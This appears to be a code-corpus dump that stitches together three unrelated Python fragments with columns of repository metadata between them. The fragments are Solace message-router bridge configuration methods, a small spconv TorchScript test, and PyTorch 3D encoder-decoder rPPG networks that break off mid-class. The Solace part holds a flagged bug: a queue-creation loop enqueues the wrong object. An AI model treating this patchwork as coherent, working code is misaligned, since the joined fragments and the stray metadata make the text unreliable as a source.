            self._bridge_username_vrouter(self.drCluster, backupBridgeName, vpn,
                                          options.primary_cluster_primary_node_name, options.username,
                                          options.password, version=version)
            # enable all bridges
            self._bridge_enable(self.primaryCluster, primaryBridgeName, vpn, version=version)
            self._bridge_enable(self.drCluster, backupBridgeName, vpn, version=version)
            # enable all remotes
            self._bridge_enable_remote_addr(self.primaryCluster, primaryBridgeName, vpn,
                                            options.backup_addr, options.primary_phys_intf, version=version)
            self._bridge_enable_remote_vrouter(self.drCluster, backupBridgeName, vpn,
                                               options.primary_cluster_primary_node_name, version=version)
            # create bridge internal queues
            self._bridge_create_queue(self.primaryCluster, options.queue, vpn, options.username, version=version)
            self._bridge_create_queue(self.drCluster, options.queue, vpn, options.username, version=version)
            # set remote internal queues
            self._bridge_set_remote_queue_addr(self.primaryCluster, primaryBridgeName, vpn,
                                               options.backup_addr, options.primary_phys_intf, options.queue,
                                               version=version)
            self._bridge_set_remote_queue_vrouter(self.drCluster, backupBridgeName, vpn,
                                                  options.primary_cluster_primary_node_name, options.queue,
                                                  version=version)

    def _create_bridge(self, api, bridgeName, vpn, **kwargs):
        """Queue creation of bridge *bridgeName* in *vpn* on both routers of *api*."""
        api.x = SolaceXMLBuilder("%s create primary bridge: %s on primary appliance" % (api.primaryRouter, bridgeName),
                                 version=api.version)
        api.x.create.bridge.bridge_name = bridgeName
        api.x.create.bridge.vpn_name = vpn
        api.x.create.bridge.primary
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder("%s create backup bridge: %s on backup appliance" % (api.backupRouter, bridgeName),
                                 version=api.version)
        api.x.create.bridge.bridge_name = bridgeName
        api.x.create.bridge.vpn_name = vpn
        api.x.create.bridge.backup
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _create_bridge_remote_vrouter(self, api, bridgeName, vpn, virtual_router, **kwargs):
        """Queue creation of a remote message-vpn on the bridge, addressed by virtual router name."""
        api.x = SolaceXMLBuilder("%s configure primary bridge: %s vrouter: %s on primary appliance" % (
            api.primaryRouter, bridgeName, virtual_router), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.create.message_vpn.vpn_name = vpn
        api.x.bridge.remote.create.message_vpn.router
        api.x.bridge.remote.create.message_vpn.virtual_router_name = "v:%s" % virtual_router
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder("%s configure backup bridge: %s vrouter: %s on backup appliance" % (
            api.backupRouter, bridgeName, virtual_router), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.create.message_vpn.vpn_name = vpn
        api.x.bridge.remote.create.message_vpn.router
        api.x.bridge.remote.create.message_vpn.virtual_router_name = "v:%s" % virtual_router
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _create_bridge_remote_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, **kwargs):
        """Queue creation of a remote message-vpn on the bridge, addressed by IP and physical interface."""
        api.x = SolaceXMLBuilder(
            "%s configure primary bridge: %s remote addr: %s phys_intf: %s on primary appliance" % (
                api.primaryRouter, bridgeName, backup_addr, phys_intf), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.create.message_vpn.vpn_name = vpn
        api.x.bridge.remote.create.message_vpn.connect_via
        api.x.bridge.remote.create.message_vpn.addr = backup_addr
        api.x.bridge.remote.create.message_vpn.interface
        api.x.bridge.remote.create.message_vpn.phys_intf = phys_intf
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder("%s configure backup bridge: %s remote addr: %s phys_intf: %s on backup appliance" % (
            api.backupRouter, bridgeName, backup_addr, phys_intf), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.create.message_vpn.vpn_name = vpn
        api.x.bridge.remote.create.message_vpn.connect_via
        api.x.bridge.remote.create.message_vpn.addr = backup_addr
        api.x.bridge.remote.create.message_vpn.interface
        api.x.bridge.remote.create.message_vpn.phys_intf = phys_intf
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_username_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, username, password, **kwargs):
        """Queue setting of the client username/password on an addr-based bridge remote."""
        api.x = SolaceXMLBuilder("%s primary bridge: %s remote username: %s on primary appliance" % (
            api.primaryRouter, bridgeName, username), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.connect_via
        api.x.bridge.remote.message_vpn.addr = backup_addr
        api.x.bridge.remote.message_vpn.interface
        api.x.bridge.remote.message_vpn.phys_intf = phys_intf
        api.x.bridge.remote.message_vpn.client_username.name = username
        api.x.bridge.remote.message_vpn.client_username.password = password
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder(
            "%s backup bridge: %s remote username: %s on backup appliance" % (api.backupRouter, bridgeName, username),
            version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.connect_via
        api.x.bridge.remote.message_vpn.addr = backup_addr
        api.x.bridge.remote.message_vpn.interface
        api.x.bridge.remote.message_vpn.phys_intf = phys_intf
        api.x.bridge.remote.message_vpn.client_username.name = username
        api.x.bridge.remote.message_vpn.client_username.password = password
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_username_vrouter(self, api, bridgeName, vpn, vrouter, username, password, **kwargs):
        """Queue setting of the client username/password on a vrouter-based bridge remote."""
        api.x = SolaceXMLBuilder("%s primary bridge: %s remote username: %s on primary appliance" % (
            api.primaryRouter, bridgeName, username), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.router
        api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
        api.x.bridge.remote.message_vpn.client_username.name = username
        api.x.bridge.remote.message_vpn.client_username.password = password
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder(
            "%s backup bridge: %s remote username: %s on backup appliance" % (api.backupRouter, bridgeName, username),
            version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.router
        api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
        api.x.bridge.remote.message_vpn.client_username.name = username
        api.x.bridge.remote.message_vpn.client_username.password = password
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_enable(self, api, bridgeName, vpn, **kwargs):
        """Queue 'no shutdown' for the bridge itself on both routers."""
        api.x = SolaceXMLBuilder(
            "%s enable bridge: %s for vpn: %s on primary appliance" % (api.primaryRouter, bridgeName, vpn),
            version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.no.shutdown
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder(
            "%s enable bridge: %s for vpn: %s on backup appliance" % (api.backupRouter, bridgeName, vpn),
            version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.no.shutdown
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_enable_remote_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, **kwargs):
        """Queue 'no shutdown' for the addr-based bridge remote on both routers."""
        api.x = SolaceXMLBuilder("%s enable primary bridge: %s remote addr: %s phys_intf: %s on primary appliance" % (
            api.primaryRouter, bridgeName, backup_addr, phys_intf), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.connect_via
        api.x.bridge.remote.message_vpn.addr = backup_addr
        api.x.bridge.remote.message_vpn.interface
        api.x.bridge.remote.message_vpn.phys_intf = phys_intf
        api.x.bridge.remote.message_vpn.no.shutdown
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder("%s enable backup bridge: %s remote addr: %s phys_intf: %s on backup appliance" % (
            api.backupRouter, bridgeName, backup_addr, phys_intf), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.connect_via
        api.x.bridge.remote.message_vpn.addr = backup_addr
        api.x.bridge.remote.message_vpn.interface
        api.x.bridge.remote.message_vpn.phys_intf = phys_intf
        api.x.bridge.remote.message_vpn.no.shutdown
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_enable_remote_vrouter(self, api, bridgeName, vpn, vrouter, **kwargs):
        """Queue 'no shutdown' for the vrouter-based bridge remote on both routers."""
        api.x = SolaceXMLBuilder("%s enable primary bridge: %s vrouter: %s" % (api.primaryRouter, bridgeName, vrouter),
                                 version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.router
        api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
        api.x.bridge.remote.message_vpn.no.shutdown
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder("%s enable backup bridge: %s vrouter: %s" % (api.backupRouter, bridgeName, vrouter),
                                 version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.router
        api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
        api.x.bridge.remote.message_vpn.no.shutdown
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_disable_remote_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, **kwargs):
        """Queue 'shutdown' for the addr-based bridge remote on both routers."""
        api.x = SolaceXMLBuilder("%s disable primary bridge: %s remote addr: %s phys_intf: %s on primary appliance" % (
            api.primaryRouter, bridgeName, backup_addr, phys_intf), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.connect_via
        api.x.bridge.remote.message_vpn.addr = backup_addr
        api.x.bridge.remote.message_vpn.interface
        api.x.bridge.remote.message_vpn.phys_intf = phys_intf
        api.x.bridge.remote.message_vpn.shutdown
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder("%s disable backup bridge: %s remote addr: %s phys_intf: %s on backup appliance" % (
            api.backupRouter, bridgeName, backup_addr, phys_intf), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.connect_via
        api.x.bridge.remote.message_vpn.addr = backup_addr
        api.x.bridge.remote.message_vpn.interface
        api.x.bridge.remote.message_vpn.phys_intf = phys_intf
        api.x.bridge.remote.message_vpn.shutdown
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_disable_remote_vrouter(self, api, bridgeName, vpn, vrouter, **kwargs):
        """Queue 'shutdown' for the vrouter-based bridge remote on both routers.

        NOTE(review): the builder description strings below say "enable" even
        though this method shuts the remote down -- looks like a copy/paste
        from _bridge_enable_remote_vrouter; the strings are descriptions only.
        """
        api.x = SolaceXMLBuilder("%s enable primary bridge: %s vrouter: %s" % (api.primaryRouter, bridgeName, vrouter),
                                 version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.router
        api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
        api.x.bridge.remote.message_vpn.shutdown
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder("%s enable backup bridge: %s vrouter: %s" % (api.backupRouter, bridgeName, vrouter),
                                 version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.router
        api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
        api.x.bridge.remote.message_vpn.shutdown
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_create_queue(self, api, queueName, vpnName, username, **kwargs):
        """Create the bridge's internal exclusive queue via SolaceQueue and enqueue its commands."""
        logger.info("%s:%s creating bridge queue: %s with owner username: %s" % (
            api.primaryRouter, api.backupRouter, queueName, username))
        queue1 = {}
        queue1['queue_config'] = {}
        queue1['queue_config']["exclusive"] = "true"
        queue1['queue_config']["queue_size"] = "4096"
        queue1['queue_config']["retries"] = 0
        queue1["name"] = queueName
        vpnd = {}
        vpnd['vpn_name'] = vpnName
        vpnd['owner_username'] = username
        q1 = SolaceQueue(api, vpnd, [queue1])
        for c in q1.queue.commands:
            # NOTE(review): loop variable `c` is unused -- every iteration
            # enqueues str(api.x) (whatever XML the builder last held), which
            # looks like it should be str(c). Confirm before relying on this.
            api.cq.enqueue(str(api.x))

    def _bridge_set_remote_queue_addr(self, api, bridgeName, vpn, backup_addr, phys_intf, queueName, **kwargs):
        """Queue binding of the message-spool queue to the addr-based bridge remote."""
        api.x = SolaceXMLBuilder("%s primary bridge: %s set remote queue: %s on primary appliance" % (
            api.primaryRouter, bridgeName, queueName), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.connect_via
        api.x.bridge.remote.message_vpn.addr = backup_addr
        api.x.bridge.remote.message_vpn.interface
        api.x.bridge.remote.message_vpn.phys_intf = phys_intf
        api.x.bridge.remote.message_vpn.message_spool.queue.name = queueName
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder(
            "%s backup bridge: %s set remote queue: %s on backup appliance" % (api.backupRouter, bridgeName, queueName),
            version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.connect_via
        api.x.bridge.remote.message_vpn.addr = backup_addr
        api.x.bridge.remote.message_vpn.interface
        api.x.bridge.remote.message_vpn.phys_intf = phys_intf
        api.x.bridge.remote.message_vpn.message_spool.queue.name = queueName
        api.cq.enqueueV2(str(api.x), backupOnly=True)

    def _bridge_set_remote_queue_vrouter(self, api, bridgeName, vpn, vrouter, queueName, **kwargs):
        """Queue binding of the message-spool queue to the vrouter-based bridge remote."""
        api.x = SolaceXMLBuilder("%s primary bridge: %s set remote queue: %s on primary appliance" % (
            api.primaryRouter, bridgeName, queueName), version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.primary
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.router
        api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
        api.x.bridge.remote.message_vpn.message_spool.queue.name = queueName
        api.cq.enqueueV2(str(api.x), primaryOnly=True)
        api.x = SolaceXMLBuilder(
            "%s backup bridge: %s set remote queue: %s on backup appliance" % (api.backupRouter, bridgeName, queueName),
            version=api.version)
        api.x.bridge.bridge_name = bridgeName
        api.x.bridge.vpn_name = vpn
        api.x.bridge.backup
        api.x.bridge.remote.message_vpn.vpn_name = vpn
        api.x.bridge.remote.message_vpn.router
        api.x.bridge.remote.message_vpn.virtual_router_name = "v:%s" % vrouter
        api.x.bridge.remote.message_vpn.message_spool.queue.name = queueName
        api.cq.enqueueV2(str(api.x), backupOnly=True)
| 51.644769
| 120
| 0.65971
| 2,698
| 21,226
| 5.035953
| 0.050408
| 0.065651
| 0.123648
| 0.11776
| 0.870391
| 0.845588
| 0.800765
| 0.779716
| 0.779716
| 0.763377
| 0
| 0.002346
| 0.236785
| 21,226
| 410
| 121
| 51.770732
| 0.836358
| 0.015971
| 0
| 0.738235
| 0
| 0
| 0.085365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.023529
| 0.020588
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
73fe90f1f9c2a44e5c7cc0c34a56279ddb7d3664
| 181
|
py
|
Python
|
src/experiment.py
|
Abastro/pointgroup-hs
|
7910ae41ba3dbcf8a5674feb8773732aa5662a48
|
[
"BSD-3-Clause"
] | null | null | null |
src/experiment.py
|
Abastro/pointgroup-hs
|
7910ae41ba3dbcf8a5674feb8773732aa5662a48
|
[
"BSD-3-Clause"
] | null | null | null |
src/experiment.py
|
Abastro/pointgroup-hs
|
7910ae41ba3dbcf8a5674feb8773732aa5662a48
|
[
"BSD-3-Clause"
] | null | null | null |
import torch
import spconv
#from lib.pointgroup_ops.functions import pointgroup_ops

# Smoke test: verify that spconv's SparseConv3d (in=32, out=64, kernel=3)
# can be compiled with TorchScript. Raises at import time if scripting fails.
torch.jit.script(spconv.SparseConv3d(32, 64, 3))
# Scripting of the pointgroup BFS clustering op is left disabled.
#torch.jit.script(pointgroup_ops.BFSCluster())
| 25.857143
| 56
| 0.81768
| 26
| 181
| 5.576923
| 0.576923
| 0.268966
| 0.193103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.071823
| 181
| 6
| 57
| 30.166667
| 0.827381
| 0.552486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73fefe62f538f3f0ab1a894fa20de3547d579115
| 21,477
|
py
|
Python
|
networks.py
|
deividbotina-alv/rtrppg
|
9cccda0c66e334aa30cb77b2f8b0b465d45665c0
|
[
"MIT"
] | null | null | null |
networks.py
|
deividbotina-alv/rtrppg
|
9cccda0c66e334aa30cb77b2f8b0b465d45665c0
|
[
"MIT"
] | null | null | null |
networks.py
|
deividbotina-alv/rtrppg
|
9cccda0c66e334aa30cb77b2f8b0b465d45665c0
|
[
"MIT"
] | 1
|
2022-03-15T10:51:58.000Z
|
2022-03-15T10:51:58.000Z
|
import torch.nn as nn
import torch
#%% 3DED128 (baseline)
class N3DED128(nn.Module):
    """3D encoder-decoder rPPG network for 128x128 input crops (baseline).

    Input: [batch, 3, T=128, W=128, H=128]; output: [batch, frames] rPPG
    signal. `frames` sets the temporal size of the final adaptive pool.
    """

    def __init__(self, frames=128):
        super(N3DED128, self).__init__()

        def conv_stage(c_in, c_out, kernel, pad):
            # Encoder stage: Conv3d -> BatchNorm3d -> ReLU.
            return nn.Sequential(
                nn.Conv3d(c_in, c_out, kernel, stride=1, padding=pad),
                nn.BatchNorm3d(c_out),
                nn.ReLU(inplace=True),
            )

        def temporal_upsample():
            # Decoder stage: transposed conv doubling T -> BatchNorm3d -> ELU.
            return nn.Sequential(
                nn.ConvTranspose3d(in_channels=64, out_channels=64,
                                   kernel_size=[4, 1, 1], stride=[2, 1, 1],
                                   padding=[1, 0, 0]),  # [1, 128, 32]
                nn.BatchNorm3d(64),
                nn.ELU(),
            )

        # Module creation order matches the original exactly.
        self.Conv1 = conv_stage(3, 16, [1, 5, 5], [0, 2, 2])
        self.Conv2 = conv_stage(16, 32, [1, 5, 5], [0, 2, 2])
        self.Conv3 = conv_stage(32, 64, [3, 3, 3], 1)
        self.Conv4 = conv_stage(64, 64, [3, 3, 3], 1)
        self.TrConv1 = temporal_upsample()
        self.TrConv2 = temporal_upsample()
        self.ConvBlock5 = nn.Conv3d(64, 1, [1, 1, 1], stride=1, padding=0)
        self.MaxpoolSpaTem_244_244 = nn.MaxPool3d((2, 4, 4), stride=(2, 4, 4))
        self.poolspa = nn.AdaptiveAvgPool3d((frames, 1, 1))

    def forward(self, x):  # [batch, Features=3, Temp=128, Width=128, Height=128]
        # Encoder: two pooled spatial stages, then two 3D conv stages.
        h = self.Conv1(x)                      # -> [b, 16, T,   W,    H]
        h = self.MaxpoolSpaTem_244_244(h)      # -> [b, 16, T/2, W/4,  H/4]
        h = self.Conv2(h)
        h = self.MaxpoolSpaTem_244_244(h)      # -> [b, 32, T/4, W/16, H/16]
        h = self.Conv3(h)
        h = self.Conv4(h)                      # -> [b, 64, T/4, ...]
        # Decoder: restore temporal resolution, collapse space, 1x1x1 head.
        h = self.TrConv1(h)                    # T/4 -> T/2
        h = self.TrConv2(h)                    # T/2 -> T
        h = self.poolspa(h)                    # -> [b, 64, frames, 1, 1]
        h = self.ConvBlock5(h)                 # -> [b, 1, frames, 1, 1]
        rPPG = h.view(-1, h.shape[2])          # -> [b, frames]
        return rPPG
#%% 3DED64
class N3DED64(nn.Module):
    """3D encoder-decoder rPPG network for 64x64 input crops.

    Input: [batch, 3, T=128, W=64, H=64]; output: [batch, frames] rPPG
    signal. Identical to N3DED128 except the first pooling stage uses a
    (2,2,2) window to suit the smaller spatial size.
    """

    def __init__(self, frames=128):
        super(N3DED64, self).__init__()

        def conv_stage(c_in, c_out, kernel, pad):
            # Encoder stage: Conv3d -> BatchNorm3d -> ReLU.
            return nn.Sequential(
                nn.Conv3d(c_in, c_out, kernel, stride=1, padding=pad),
                nn.BatchNorm3d(c_out),
                nn.ReLU(inplace=True),
            )

        def temporal_upsample():
            # Decoder stage: transposed conv doubling T -> BatchNorm3d -> ELU.
            return nn.Sequential(
                nn.ConvTranspose3d(in_channels=64, out_channels=64,
                                   kernel_size=[4, 1, 1], stride=[2, 1, 1],
                                   padding=[1, 0, 0]),  # [1, 128, 32]
                nn.BatchNorm3d(64),
                nn.ELU(),
            )

        # Module creation order matches the original exactly.
        self.Conv1 = conv_stage(3, 16, [1, 5, 5], [0, 2, 2])
        self.Conv2 = conv_stage(16, 32, [1, 5, 5], [0, 2, 2])
        self.Conv3 = conv_stage(32, 64, [3, 3, 3], 1)
        self.Conv4 = conv_stage(64, 64, [3, 3, 3], 1)
        self.TrConv1 = temporal_upsample()
        self.TrConv2 = temporal_upsample()
        self.ConvBlock5 = nn.Conv3d(64, 1, [1, 1, 1], stride=1, padding=0)
        self.MaxpoolSpaTem_244_244 = nn.MaxPool3d((2, 4, 4), stride=(2, 4, 4))
        self.MaxpoolSpaTem_222_222 = nn.MaxPool3d((2, 2, 2), stride=2)
        self.poolspa = nn.AdaptiveAvgPool3d((frames, 1, 1))

    def forward(self, x):  # [batch, Features=3, Temp=128, Width=64, Height=64]
        # Encoder: gentler first pool (2,2,2) for the smaller spatial input.
        h = self.Conv1(x)                      # -> [b, 16, T,   W,   H]
        h = self.MaxpoolSpaTem_222_222(h)      # -> [b, 16, T/2, W/2, H/2]
        h = self.Conv2(h)
        h = self.MaxpoolSpaTem_244_244(h)      # -> [b, 32, T/4, W/8, H/8]
        h = self.Conv3(h)
        h = self.Conv4(h)
        # Decoder: restore temporal resolution, collapse space, 1x1x1 head.
        h = self.TrConv1(h)                    # T/4 -> T/2
        h = self.TrConv2(h)                    # T/2 -> T
        h = self.poolspa(h)                    # -> [b, 64, frames, 1, 1]
        h = self.ConvBlock5(h)                 # -> [b, 1, frames, 1, 1]
        rPPG = h.view(-1, h.shape[2])          # -> [b, frames]
        return rPPG
#%% 3DED32
class N3DED32(nn.Module):
    """3D encoder-decoder rPPG network for 32x32 input frames.

    Maps a video clip shaped [batch, 3, T, 32, 32] to a per-frame pulse
    signal shaped [batch, frames].
    """

    def __init__(self, frames=128):
        super(N3DED32, self).__init__()

        def encoder_stage(c_in, c_out, kernel, pad):
            # Conv3d -> BatchNorm3d -> ReLU; spatial/temporal size preserved.
            return nn.Sequential(
                nn.Conv3d(c_in, c_out, kernel, stride=1, padding=pad),
                nn.BatchNorm3d(c_out),
                nn.ReLU(inplace=True),
            )

        def temporal_upsampler(channels):
            # Transposed conv that doubles the temporal length only.
            return nn.Sequential(
                nn.ConvTranspose3d(in_channels=channels, out_channels=channels,
                                   kernel_size=[4, 1, 1], stride=[2, 1, 1],
                                   padding=[1, 0, 0]),
                nn.BatchNorm3d(channels),
                nn.ELU(),
            )

        self.Conv1 = encoder_stage(3, 16, [1, 5, 5], [0, 2, 2])
        self.Conv2 = encoder_stage(16, 32, [1, 5, 5], [0, 2, 2])
        self.Conv3 = encoder_stage(32, 64, [3, 3, 3], 1)
        self.Conv4 = encoder_stage(64, 64, [3, 3, 3], 1)
        self.TrConv1 = temporal_upsampler(64)
        self.TrConv2 = temporal_upsampler(64)
        self.ConvBlock5 = nn.Conv3d(64, 1, [1, 1, 1], stride=1, padding=0)
        self.MaxpoolSpaTem_244_244 = nn.MaxPool3d((2, 4, 4), stride=(2, 4, 4))
        self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
        self.poolspa = nn.AdaptiveAvgPool3d((frames, 1, 1))

    def forward(self, x):
        """Map [b, 3, T, 32, 32] -> [b, frames] rPPG signal."""
        # Encoder: first pool only in time, then in both time and space.
        feat = self.MaxpoolTem_211_211(self.Conv1(x))
        feat = self.MaxpoolSpaTem_244_244(self.Conv2(feat))
        feat = self.Conv4(self.Conv3(feat))
        # Decoder: two transposed convs restore the temporal resolution.
        feat = self.TrConv2(self.TrConv1(feat))
        # Collapse space, then squeeze channels down to a single signal.
        feat = self.ConvBlock5(self.poolspa(feat))
        return feat.view(-1, feat.shape[2])
#%% 3DED16
class N3DED16(nn.Module):
    """3D encoder-decoder rPPG network for 16x16 input frames.

    Maps a video clip shaped [batch, 3, T, 16, 16] to a per-frame pulse
    signal shaped [batch, frames].
    """

    def __init__(self, frames=128):
        super(N3DED16, self).__init__()

        def encoder_stage(c_in, c_out, kernel, pad):
            # Conv3d -> BatchNorm3d -> ReLU; spatial/temporal size preserved.
            return nn.Sequential(
                nn.Conv3d(c_in, c_out, kernel, stride=1, padding=pad),
                nn.BatchNorm3d(c_out),
                nn.ReLU(inplace=True),
            )

        def temporal_upsampler(channels):
            # Transposed conv that doubles the temporal length only.
            return nn.Sequential(
                nn.ConvTranspose3d(in_channels=channels, out_channels=channels,
                                   kernel_size=[4, 1, 1], stride=[2, 1, 1],
                                   padding=[1, 0, 0]),
                nn.BatchNorm3d(channels),
                nn.ELU(),
            )

        self.Conv1 = encoder_stage(3, 16, [1, 5, 5], [0, 2, 2])
        self.Conv2 = encoder_stage(16, 32, [1, 5, 5], [0, 2, 2])
        self.Conv3 = encoder_stage(32, 64, [3, 3, 3], 1)
        self.Conv4 = encoder_stage(64, 64, [3, 3, 3], 1)
        self.TrConv1 = temporal_upsampler(64)
        self.TrConv2 = temporal_upsampler(64)
        self.ConvBlock5 = nn.Conv3d(64, 1, [1, 1, 1], stride=1, padding=0)
        self.MaxpoolSpaTem_222_222 = nn.MaxPool3d((2, 2, 2), stride=2)
        self.MaxpoolTem_211_211 = nn.MaxPool3d((2, 1, 1), stride=(2, 1, 1))
        self.poolspa = nn.AdaptiveAvgPool3d((frames, 1, 1))

    def forward(self, x):
        """Map [b, 3, T, 16, 16] -> [b, frames] rPPG signal."""
        # Encoder: pool in time after Conv1, in time and space after Conv2.
        feat = self.MaxpoolTem_211_211(self.Conv1(x))
        feat = self.MaxpoolSpaTem_222_222(self.Conv2(feat))
        feat = self.Conv4(self.Conv3(feat))
        # Decoder: two transposed convs restore the temporal resolution.
        feat = self.TrConv2(self.TrConv1(feat))
        # Collapse space, then squeeze channels down to a single signal.
        feat = self.ConvBlock5(self.poolspa(feat))
        return feat.view(-1, feat.shape[2])
#%% 3DED8 (RTrPPG) - Note that 3DED8, 3DED4, and 3DED2 are the same architecture.
class N3DED8(nn.Module):
    """3D encoder-decoder rPPG network (RTrPPG) for 8x8 input frames.

    Maps a video clip shaped [batch, 3, T, 8, 8] to a per-frame pulse
    signal shaped [batch, frames]. Only temporal pooling is used; the
    spatial resolution is already small enough.
    """

    def __init__(self, frames=128):
        super(N3DED8, self).__init__()

        def encoder_stage(c_in, c_out, kernel, pad):
            # Conv3d -> BatchNorm3d -> ReLU; spatial/temporal size preserved.
            return nn.Sequential(
                nn.Conv3d(c_in, c_out, kernel, stride=1, padding=pad),
                nn.BatchNorm3d(c_out),
                nn.ReLU(inplace=True),
            )

